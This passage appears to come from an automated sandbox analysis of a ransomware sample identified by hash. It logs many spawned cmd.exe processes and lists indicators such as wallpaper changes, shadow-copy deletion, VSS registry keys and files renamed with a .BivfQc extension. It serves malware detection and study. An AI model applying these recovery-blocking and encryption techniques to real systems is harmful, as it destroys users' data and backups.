79385ed97732aee0036e67824de18e28.exe 170 PID 1456 wrote to memory of 380 1456 79385ed97732aee0036e67824de18e28.exe 170 PID 380 wrote to memory of 1268 380 cmd.exe 172 PID 380 wrote to memory of 1268 380 cmd.exe 172 PID 380 wrote to memory of 1268 380 cmd.exe 172 PID 380 wrote to memory of 1268 380 cmd.exe 172 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 173 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 173 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 173 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 173 PID 804 wrote to memory of 884 804 cmd.exe 175 PID 804 wrote to memory of 884 804 cmd.exe 175 PID 804 wrote to memory of 884 804 cmd.exe 175 PID 804 wrote to memory of 884 804 cmd.exe 175 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 176 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 176 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 176 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 176 PID 1276 wrote to memory of 1628 1276 cmd.exe 178 PID 1276 wrote to memory of 1628 1276 cmd.exe 178 PID 1276 wrote to memory of 1628 1276 cmd.exe 178 PID 1276 wrote to memory of 1628 1276 cmd.exe 178 PID 1456 wrote to memory of 1816 1456 79385ed97732aee0036e67824de18e28.exe 179 PID 1456 wrote to memory of 1816 1456 79385ed97732aee0036e67824de18e28.exe 179 PID 1456 wrote to memory of 1816 1456 79385ed97732aee0036e67824de18e28.exe 179 PID 1456 wrote to memory of 1816 1456 79385ed97732aee0036e67824de18e28.exe 179 PID 1816 wrote to memory of 1784 1816 cmd.exe 181 PID 1816 wrote to memory of 1784 1816 cmd.exe 181 PID 1816 wrote to memory of 1784 1816 cmd.exe 181 PID 1816 wrote to memory of 1784 1816 cmd.exe 181 PID 1456 wrote to memory of 1776 1456 79385ed97732aee0036e67824de18e28.exe 182 PID 1456 wrote to memory of 1776 1456 79385ed97732aee0036e67824de18e28.exe 182 PID 1456 wrote to memory of 1776 1456 79385ed97732aee0036e67824de18e28.exe 182 PID 1456 wrote to memory of 1776 1456 79385ed97732aee0036e67824de18e28.exe 182 PID 1776 wrote to memory of 1632 1776 cmd.exe 184 PID 1776 wrote to memory of 1632 1776 cmd.exe 184 PID 1776 wrote to memory of 1632 1776 cmd.exe 184 PID 1776 wrote to memory of 1632 1776 cmd.exe 184 PID 1456 wrote to memory of 1916 1456 79385ed97732aee0036e67824de18e28.exe 185 PID 1456 wrote to memory of 1916 1456 79385ed97732aee0036e67824de18e28.exe 185 PID 1456 wrote to memory of 1916 1456 79385ed97732aee0036e67824de18e28.exe 185 PID 1456 wrote to memory of 1916 1456 79385ed97732aee0036e67824de18e28.exe 185 PID 1916 wrote to memory of 1524 1916 cmd.exe 187 PID 1916 wrote to memory of 1524 1916 cmd.exe 187 PID 1916 wrote to memory of 1524 1916 cmd.exe 187 PID 1916 wrote to memory of 1524 1916 cmd.exe 187 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 188 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 188 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 188 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 188 PID 1852 wrote to memory of 1252 1852 cmd.exe 190 PID 1852 wrote to memory of 1252 1852 cmd.exe 190 PID 1852 wrote to memory of 1252 1852 cmd.exe 190 PID 1852 wrote to memory of 1252 1852 cmd.exe 190 PID 1456 wrote to memory of 2020 1456 79385ed97732aee0036e67824de18e28.exe 191 PID 1456 wrote to memory of 2020 1456 79385ed97732aee0036e67824de18e28.exe 191 PID 1456 wrote to memory of 2020 1456 79385ed97732aee0036e67824de18e28.exe 191 PID 1456 wrote to memory of 2020 1456 79385ed97732aee0036e67824de18e28.exe 191 PID 2020 wrote to memory of 1872 2020 cmd.exe 193 PID 2020 wrote to memory of 1872 2020 cmd.exe 193 PID 2020 wrote to memory of 1872 2020 cmd.exe 193 PID 2020 wrote to memory of 1872 2020 cmd.exe 193 PID 1456 wrote to memory of 272 1456 79385ed97732aee0036e67824de18e28.exe 194 PID 1456 wrote to memory of 272 1456 79385ed97732aee0036e67824de18e28.exe 194 PID 1456 wrote to memory of 272 1456 79385ed97732aee0036e67824de18e28.exe 194 PID 1456 wrote to memory of 272 1456 79385ed97732aee0036e67824de18e28.exe 194 PID 272 wrote to memory of 2028 272 cmd.exe 196 PID 272 wrote to memory of 2028 272 cmd.exe 196 PID 272 wrote to memory of 2028 272 cmd.exe 196 PID 272 wrote to memory of 2028 272 cmd.exe 196 PID 1456 wrote to memory of 1340 1456 79385ed97732aee0036e67824de18e28.exe 197 PID 1456 wrote to memory of 1340 1456 79385ed97732aee0036e67824de18e28.exe 197 PID 1456 wrote to memory of 1340 1456 79385ed97732aee0036e67824de18e28.exe 197 PID 1456 wrote to memory of 1340 1456 79385ed97732aee0036e67824de18e28.exe 197 PID 1340 wrote to memory of 1052 1340 cmd.exe 199 PID 1340 wrote to memory of 1052 1340 cmd.exe 199 PID 1340 wrote to memory of 1052 1340 cmd.exe 199 PID 1340 wrote to memory of 1052 1340 cmd.exe 199 PID 1456 wrote to memory of 912 1456 79385ed97732aee0036e67824de18e28.exe 200 PID 1456 wrote to memory of 912 1456 79385ed97732aee0036e67824de18e28.exe 200 PID 1456 wrote to memory of 912 1456 79385ed97732aee0036e67824de18e28.exe 200 PID 1456 wrote to memory of 912 1456 79385ed97732aee0036e67824de18e28.exe 200 PID 912 wrote to memory of 1392 912 cmd.exe 202 PID 912 wrote to memory of 1392 912 cmd.exe 202 PID 912 wrote to memory of 1392 912 cmd.exe 202 PID 912 wrote to memory of 1392 912 cmd.exe 202 PID 1456 wrote to memory of 1796 1456 79385ed97732aee0036e67824de18e28.exe 203 PID 1456 wrote to memory of 1796 1456 79385ed97732aee0036e67824de18e28.exe 203 PID 1456 wrote to memory of 1796 1456 79385ed97732aee0036e67824de18e28.exe 203 PID 1456 wrote to memory of 1796 1456 79385ed97732aee0036e67824de18e28.exe 203 PID 1796 wrote to memory of 1036 1796 cmd.exe 205 PID 1796 wrote to memory of 1036 1796 cmd.exe 205 PID 1796 wrote to memory of 1036 1796 cmd.exe 205 PID 1796 wrote to memory of 1036 1796 cmd.exe 205 PID 1456 wrote to memory of 1236 1456 79385ed97732aee0036e67824de18e28.exe 206 PID 1456 wrote to memory of 1236 1456 79385ed97732aee0036e67824de18e28.exe 206 PID 1456 wrote to memory of 1236 1456 79385ed97732aee0036e67824de18e28.exe 206 PID 1456 wrote to memory of 1236 1456 79385ed97732aee0036e67824de18e28.exe 206 PID 1236 wrote to memory of 548 1236 cmd.exe 208 PID 1236 wrote to memory of 548 1236 cmd.exe 208 PID 1236 wrote to memory of 548 1236 cmd.exe 208 PID 1236 wrote to memory of 548 1236 cmd.exe 208 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 209 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 209 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 209 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 209 PID 1800 wrote to memory of 1360 1800 cmd.exe 211 PID 1800 wrote to memory of 1360 1800 cmd.exe 211 PID 1800 wrote to memory of 1360 1800 cmd.exe 211 PID 1800 wrote to memory of 1360 1800 cmd.exe 211 PID 1456 wrote to memory of 1532 1456 79385ed97732aee0036e67824de18e28.exe 212 PID 1456 wrote to memory of 1532 1456 79385ed97732aee0036e67824de18e28.exe 212 PID 1456 wrote to memory of 1532 1456 79385ed97732aee0036e67824de18e28.exe 212 PID 1456 wrote to memory of 1532 1456 79385ed97732aee0036e67824de18e28.exe 212 PID 1532 wrote to memory of 672 1532 cmd.exe 214 PID 1532 wrote to memory of 672 1532 cmd.exe 214 PID 1532 wrote to memory of 672 1532 cmd.exe 214 PID 1532 wrote to memory of 672 1532 cmd.exe 214 PID 1456 wrote to memory of 1552 1456 79385ed97732aee0036e67824de18e28.exe 215 PID 1456 wrote to memory of 1552 1456 79385ed97732aee0036e67824de18e28.exe 215 PID 1456 wrote to memory of 1552 1456 79385ed97732aee0036e67824de18e28.exe 215 PID 1456 wrote to memory of 1552 1456 79385ed97732aee0036e67824de18e28.exe 215 PID 1552 wrote to memory of 1580 1552 cmd.exe 217 PID 1552 wrote to memory of 1580 1552 cmd.exe 217 PID 1552 wrote to memory of 1580 1552 cmd.exe 217 PID 1552 wrote to memory of 1580 1552 cmd.exe 217 PID 1456 wrote to memory of 1936 1456 79385ed97732aee0036e67824de18e28.exe 218 PID 1456 wrote to memory of 1936 1456 79385ed97732aee0036e67824de18e28.exe 218 PID 1456 wrote to memory of 1936 1456 79385ed97732aee0036e67824de18e28.exe 218 PID 1456 wrote to memory of 1936 1456 79385ed97732aee0036e67824de18e28.exe 218 PID 1936 wrote to memory of 2040 1936 cmd.exe 220 PID 1936 wrote to memory of 2040 1936 cmd.exe 220 PID 1936 wrote to memory of 2040 1936 cmd.exe 220 PID 1936 wrote to memory of 2040 1936 cmd.exe 220 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 221 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 221 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 221 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 221 PID 1992 wrote to memory of 512 1992 cmd.exe 223 PID 1992 wrote to memory of 512 1992 cmd.exe 223 PID 1992 wrote to memory of 512 1992 cmd.exe 223 PID 1992 wrote to memory of 512 1992 cmd.exe 223 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 224 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 224 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 224 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 224 PID 1896 wrote to memory of 1404 1896 cmd.exe 226 PID 1896 wrote to memory of 1404 1896 cmd.exe 226 PID 1896 wrote to memory of 1404 1896 cmd.exe 226 PID 1896 wrote to memory of 1404 1896 cmd.exe 226 PID 1456 wrote to memory of 1488 1456 79385ed97732aee0036e67824de18e28.exe 227 PID 1456 wrote to memory of 1488 1456 79385ed97732aee0036e67824de18e28.exe 227 PID 1456 wrote to memory of 1488 1456 79385ed97732aee0036e67824de18e28.exe 227 PID 1456 wrote to memory of 1488 1456 79385ed97732aee0036e67824de18e28.exe 227 PID 1488 wrote to memory of 1988 1488 cmd.exe 229 PID 1488 wrote to memory of 1988 1488 cmd.exe 229 PID 1488 wrote to memory of 1988 1488 cmd.exe 229 PID 1488 wrote to memory of 1988 1488 cmd.exe 229 PID 1456 wrote to memory of 520 1456 79385ed97732aee0036e67824de18e28.exe 230 PID 1456 wrote to memory of 520 1456 79385ed97732aee0036e67824de18e28.exe 230 PID 1456 wrote to memory of 520 1456 79385ed97732aee0036e67824de18e28.exe 230 PID 1456 wrote to memory of 520 1456 79385ed97732aee0036e67824de18e28.exe 230 PID 520 wrote to memory of 380 520 cmd.exe 232 PID 520 wrote to memory of 380 520 cmd.exe 232 PID 520 wrote to memory of 380 520 cmd.exe 232 PID 520 wrote to memory of 380 520 cmd.exe 232 PID 1456 wrote to memory of 1280 1456 79385ed97732aee0036e67824de18e28.exe 233 PID 1456 wrote to memory of 1280 1456 79385ed97732aee0036e67824de18e28.exe 233 PID 1456 wrote to memory of 1280 1456 79385ed97732aee0036e67824de18e28.exe 233 PID 1456 wrote to memory of 1280 1456 79385ed97732aee0036e67824de18e28.exe 233 PID 1280 wrote to memory of 804 1280 cmd.exe 235 PID 1280 wrote to memory of 804 1280 cmd.exe 235 PID 1280 wrote to memory of 804 1280 cmd.exe 235 PID 1280 wrote to memory of 804 1280 cmd.exe 235 PID 1456 wrote to memory of 1644 1456 79385ed97732aee0036e67824de18e28.exe 236 PID 1456 wrote to memory of 1644 1456 79385ed97732aee0036e67824de18e28.exe 236 PID 1456 wrote to memory of 1644 1456 79385ed97732aee0036e67824de18e28.exe 236 PID 1456 wrote to memory of 1644 1456 79385ed97732aee0036e67824de18e28.exe 236 PID 1644 wrote to memory of 1760 1644 cmd.exe 238 PID 1644 wrote to memory of 1760 1644 cmd.exe 238 PID 1644 wrote to memory of 1760 1644 cmd.exe 238 PID 1644 wrote to memory of 1760 1644 cmd.exe 238 PID 1456 wrote to memory of 1848 1456 79385ed97732aee0036e67824de18e28.exe 239 PID 1456 wrote to memory of 1848 1456 79385ed97732aee0036e67824de18e28.exe 239 PID 1456 wrote to memory of 1848 1456 79385ed97732aee0036e67824de18e28.exe 239 PID 1456 wrote to memory of 1848 1456 79385ed97732aee0036e67824de18e28.exe 239 PID 1848 wrote to memory of 1528 1848 cmd.exe 241 PID 1848 wrote to memory of 1528 1848 cmd.exe 241 PID 1848 wrote to memory of 1528 1848 cmd.exe 241 PID 1848 wrote to memory of 1528 1848 cmd.exe 241 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 242 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 242 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 242 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 242 PID 1572 wrote to memory of 1932 1572 cmd.exe 244 PID 1572 wrote to memory of 1932 1572 cmd.exe 244 PID 1572 wrote to memory of 1932 1572 cmd.exe 244 PID 1572 wrote to memory of 1932 1572 cmd.exe 244 PID 1456 wrote to memory of 1912 1456 79385ed97732aee0036e67824de18e28.exe 245 PID 1456 wrote to memory of 1912 1456 79385ed97732aee0036e67824de18e28.exe 245 PID 1456 wrote to memory of 1912 1456 79385ed97732aee0036e67824de18e28.exe 245 PID 1456 wrote to memory of 1912 1456 79385ed97732aee0036e67824de18e28.exe 245 PID 1912 wrote to memory of 1916 1912 cmd.exe 247 PID 1912 wrote to memory of 1916 1912 cmd.exe 247 PID 1912 wrote to memory of 1916 1912 cmd.exe 247 PID 1912 wrote to memory of 1916 1912 cmd.exe 247 PID 1456 wrote to memory of 1612 1456 79385ed97732aee0036e67824de18e28.exe 248 PID 1456 wrote to memory of 1612 1456 79385ed97732aee0036e67824de18e28.exe 248 PID 1456 wrote to memory of 1612 1456 79385ed97732aee0036e67824de18e28.exe 248 PID 1456 wrote to memory of 1612 1456 79385ed97732aee0036e67824de18e28.exe 248 PID 1612 wrote to memory of 980 1612 cmd.exe 250 PID 1612 wrote to memory of 980 1612 cmd.exe 250 PID 1612 wrote to memory of 980 1612 cmd.exe 250 PID 1612 wrote to memory of 980 1612 cmd.exe 250 PID 1456 wrote to memory of 1060 1456 79385ed97732aee0036e67824de18e28.exe 251 PID 1456 wrote to memory of 1060 1456 79385ed97732aee0036e67824de18e28.exe 251 PID 1456 wrote to memory of 1060 1456 79385ed97732aee0036e67824de18e28.exe 251 PID 1456 wrote to memory of 1060 1456 79385ed97732aee0036e67824de18e28.exe 251 PID 1060 wrote to memory of 2024 1060 cmd.exe 253 PID 1060 wrote to memory of 2024 1060 cmd.exe 253 PID 1060 wrote to memory of 2024 1060 cmd.exe 253 PID 1060 wrote to memory of 2024 1060 cmd.exe 253 PID 1456 wrote to memory of 820 1456 79385ed97732aee0036e67824de18e28.exe 254 PID 1456 wrote to memory of 820 1456 79385ed97732aee0036e67824de18e28.exe 254 PID 1456 wrote to memory of 820 1456 79385ed97732aee0036e67824de18e28.exe 254 PID 1456 wrote to memory of 820 1456 79385ed97732aee0036e67824de18e28.exe 254 PID 820 wrote to memory of 272 820 cmd.exe 256 PID 820 wrote to memory of 272 820 cmd.exe 256 PID 820 wrote to memory of 272 820 cmd.exe 256 PID 820 wrote to memory of 272 820 cmd.exe 256 PID 1456 wrote to memory of 832 1456 79385ed97732aee0036e67824de18e28.exe 257 PID 1456 wrote to memory of 832 1456 79385ed97732aee0036e67824de18e28.exe 257 PID 1456 wrote to memory of 832 1456 79385ed97732aee0036e67824de18e28.exe 257 PID 1456 wrote to memory of 832 1456 79385ed97732aee0036e67824de18e28.exe 257 PID 832 wrote to memory of 608 832 cmd.exe 259 PID 832 wrote to memory of 608 832 cmd.exe 259 PID 832 wrote to memory of 608 832 cmd.exe 259 PID 832 wrote to memory of 608 832 cmd.exe 259 PID 1456 wrote to memory of 1820 1456 79385ed97732aee0036e67824de18e28.exe 260 PID 1456 wrote to memory of 1820 1456 79385ed97732aee0036e67824de18e28.exe 260 PID 1456 wrote to memory of 1820 1456 79385ed97732aee0036e67824de18e28.exe 260 PID 1456 wrote to memory of 1820 1456 79385ed97732aee0036e67824de18e28.exe 260 PID 1820 wrote to memory of 912 1820 cmd.exe 262 PID 1820 wrote to memory of 912 1820 cmd.exe 262 PID 1820 wrote to memory of 912 1820 cmd.exe 262 PID 1820 wrote to memory of 912 1820 cmd.exe 262 PID 1456 wrote to memory of 1812 1456 79385ed97732aee0036e67824de18e28.exe 263 PID 1456 wrote to memory of 1812 1456 79385ed97732aee0036e67824de18e28.exe 263 PID 1456 wrote to memory of 1812 1456 79385ed97732aee0036e67824de18e28.exe 263 PID 1456 wrote to memory of 1812 1456 79385ed97732aee0036e67824de18e28.exe 263 PID 1812 wrote to memory of 1608 1812 cmd.exe 265 PID 1812 wrote to memory of 1608 1812 cmd.exe 265 PID 1812 wrote to memory of 1608 1812 cmd.exe 265 PID 1812 wrote to memory of 1608 1812 cmd.exe 265 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 266 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 266 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 266 PID 1456 wrote to memory of 1276 1456 79385ed97732aee0036e67824de18e28.exe 266 PID 1276 wrote to memory of 1236 1276 cmd.exe 268 PID 1276 wrote to memory of 1236 1276 cmd.exe 268 PID 1276 wrote to memory of 1236 1276 cmd.exe 268 PID 1276 wrote to memory of 1236 1276 cmd.exe 268 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 269 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 269 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 269 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 269 PID 1732 wrote to memory of 1800 1732 cmd.exe 271 PID 1732 wrote to memory of 1800 1732 cmd.exe 271 PID 1732 wrote to memory of 1800 1732 cmd.exe 271 PID 1732 wrote to memory of 1800 1732 cmd.exe 271 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 272 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 272 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 272 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 272 PID 1880 wrote to memory of 1532 1880 cmd.exe 274 PID 1880 wrote to memory of 1532 1880 cmd.exe 274 PID 1880 wrote to memory of 1532 1880 cmd.exe 274 PID 1880 wrote to memory of 1532 1880 cmd.exe 274 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 275 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 275 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 275 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 275 PID 268 wrote to memory of 468 268 cmd.exe 277 PID 268 wrote to memory of 468 268 cmd.exe 277 PID 268 wrote to memory of 468 268 cmd.exe 277 PID 268 wrote to memory of 468 268 cmd.exe 277 PID 1456 wrote to memory of 1856 1456 79385ed97732aee0036e67824de18e28.exe 278 PID 1456 wrote to memory of 1856 1456 79385ed97732aee0036e67824de18e28.exe 278 PID 1456 wrote to memory of 1856 1456 79385ed97732aee0036e67824de18e28.exe 278 PID 1456 wrote to memory of 1856 1456 79385ed97732aee0036e67824de18e28.exe 278 PID 1856 wrote to memory of 2008 1856 cmd.exe 280 PID 1856 wrote to memory of 2008 1856 cmd.exe 280 PID 1856 wrote to memory of 2008 1856 cmd.exe 280 PID 1856 wrote to memory of 2008 1856 cmd.exe 280 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 281 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 281 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 281 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 281 PID 512 wrote to memory of 1496 512 cmd.exe 283 PID 512 wrote to memory of 1496 512 cmd.exe 283 PID 512 wrote to memory of 1496 512 cmd.exe 283 PID 512 wrote to memory of 1496 512 cmd.exe 283 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 284 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 284 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 284 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 284 PID 1404 wrote to memory of 2032 1404 cmd.exe 286 PID 1404 wrote to memory of 2032 1404 cmd.exe 286 PID 1404 wrote to memory of 2032 1404 cmd.exe 286 PID 1404 wrote to memory of 2032 1404 cmd.exe 286 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 287 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 287 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 287 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 287 PID 1988 wrote to memory of 1340 1988 cmd.exe 289 PID 1988 wrote to memory of 1340 1988 cmd.exe 289 PID 1988 wrote to memory of 1340 1988 cmd.exe 289 PID 1988 wrote to memory of 1340 1988 cmd.exe 289 PID 1456 wrote to memory of 380 1456 79385ed97732aee0036e67824de18e28.exe 290 PID 1456 wrote to memory of 380 1456 79385ed97732aee0036e67824de18e28.exe 290 PID 1456 wrote to memory of 380 1456 79385ed97732aee0036e67824de18e28.exe 290 PID 1456 wrote to memory of 380 1456 79385ed97732aee0036e67824de18e28.exe 290 PID 380 wrote to memory of 1400 380 cmd.exe 292 PID 380 wrote to memory of 1400 380 cmd.exe 292 PID 380 wrote to memory of 1400 380 cmd.exe 292 PID 380 wrote to memory of 1400 380 cmd.exe 292 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 293 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 293 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 293 PID 1456 wrote to memory of 804 1456 79385ed97732aee0036e67824de18e28.exe 293 PID 804 wrote to memory of 1804 804 cmd.exe 295 PID 804 wrote to memory of 1804 804 cmd.exe 295 PID 804 wrote to memory of 1804 804 cmd.exe 295 PID 804 wrote to memory of 1804 804 cmd.exe 295 PID 1456 wrote to memory of 1760 1456 79385ed97732aee0036e67824de18e28.exe 296 PID 1456 wrote to memory of 1760 1456 79385ed97732aee0036e67824de18e28.exe 296 PID 1456 wrote to memory of 1760 1456 79385ed97732aee0036e67824de18e28.exe 296 PID 1456 wrote to memory of 1760 1456 79385ed97732aee0036e67824de18e28.exe 296 PID 1760 wrote to memory of 740 1760 cmd.exe 298 PID 1760 wrote to memory of 740 1760 cmd.exe 298 PID 1760 wrote to memory of 740 1760 cmd.exe 298 PID 1760 wrote to memory of 740 1760 cmd.exe 298 PID 1456 wrote to memory of 1528 1456 79385ed97732aee0036e67824de18e28.exe 299 PID 1456 wrote to memory of 1528 1456 79385ed97732aee0036e67824de18e28.exe 299 PID 1456 wrote to memory of 1528 1456 79385ed97732aee0036e67824de18e28.exe 299 PID 1456 wrote to memory of 1528 1456 79385ed97732aee0036e67824de18e28.exe 299 PID 1528 wrote to memory of 1356 1528 cmd.exe 301 PID 1528 wrote to memory of 1356 1528 cmd.exe 301 PID 1528 wrote to memory of 1356 1528 cmd.exe 301 PID 1528 wrote to memory of 1356 1528 cmd.exe 301 PID 1456 wrote to memory of 1932 1456 79385ed97732aee0036e67824de18e28.exe 302 PID 1456 wrote to memory of 1932 1456 79385ed97732aee0036e67824de18e28.exe 302 PID 1456 wrote to memory of 1932 1456 79385ed97732aee0036e67824de18e28.exe 302 PID 1456 wrote to memory of 1932 1456 79385ed97732aee0036e67824de18e28.exe 302 PID 1932 wrote to memory of 1556 1932 cmd.exe 304 PID 1932 wrote to memory of 1556 1932 cmd.exe 304 PID 1932 wrote to memory of 1556 1932 cmd.exe 304 PID 1932 wrote to memory of 1556 1932 cmd.exe 304 PID 1456 wrote to memory of 656 1456 79385ed97732aee0036e67824de18e28.exe 310 PID 1456 wrote to memory of 656 1456 79385ed97732aee0036e67824de18e28.exe 310 PID 1456 wrote to memory of 656 1456 79385ed97732aee0036e67824de18e28.exe 310 PID 1456 wrote to memory of 656 1456 79385ed97732aee0036e67824de18e28.exe 310 PID 656 wrote to memory of 672 656 cmd.exe 312 PID 656 wrote to memory of 672 656 cmd.exe 312 PID 656 wrote to memory of 672 656 cmd.exe 312 PID 656 wrote to memory of 672 656 cmd.exe 312 -
Enumerates connected drives 3 TTPs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp" 79385ed97732aee0036e67824de18e28.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Modifies extensions of user files 19 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\InvokeMeasure.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe File opened for modification C:\Users\Admin\Pictures\RestartReset.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe File opened for modification C:\Users\Admin\Pictures\AssertDisable.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe File opened for modification C:\Users\Admin\Pictures\DenyJoin.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe File opened for modification C:\Users\Admin\Pictures\DismountEdit.tiff 79385ed97732aee0036e67824de18e28.exe File renamed C:\Users\Admin\Pictures\DismountEdit.tiff => C:\Users\Admin\Pictures\DismountEdit.tiff.BivfQc 79385ed97732aee0036e67824de18e28.exe File renamed C:\Users\Admin\Pictures\InstallNew.crw => C:\Users\Admin\Pictures\InstallNew.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe File opened for modification C:\Users\Admin\Pictures\InstallNew.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe File renamed C:\Users\Admin\Pictures\PushDeny.crw => C:\Users\Admin\Pictures\PushDeny.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe File renamed C:\Users\Admin\Pictures\DenyJoin.tif => C:\Users\Admin\Pictures\DenyJoin.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe File renamed C:\Users\Admin\Pictures\DisconnectEdit.raw => C:\Users\Admin\Pictures\DisconnectEdit.raw.BivfQc 79385ed97732aee0036e67824de18e28.exe File opened for modification C:\Users\Admin\Pictures\DismountEdit.tiff.BivfQc 79385ed97732aee0036e67824de18e28.exe File renamed C:\Users\Admin\Pictures\OutComplete.tif => C:\Users\Admin\Pictures\OutComplete.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe File renamed C:\Users\Admin\Pictures\AssertDisable.tif => C:\Users\Admin\Pictures\AssertDisable.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe File opened for modification C:\Users\Admin\Pictures\DisconnectEdit.raw.BivfQc 79385ed97732aee0036e67824de18e28.exe File renamed C:\Users\Admin\Pictures\InvokeMeasure.tif => C:\Users\Admin\Pictures\InvokeMeasure.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe File opened for modification C:\Users\Admin\Pictures\OutComplete.tif.BivfQc 79385ed97732aee0036e67824de18e28.exe File opened for modification C:\Users\Admin\Pictures\PushDeny.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe File renamed C:\Users\Admin\Pictures\RestartReset.crw => C:\Users\Admin\Pictures\RestartReset.crw.BivfQc 79385ed97732aee0036e67824de18e28.exe -
Suspicious behavior: EnumeratesProcesses 398 IoCs
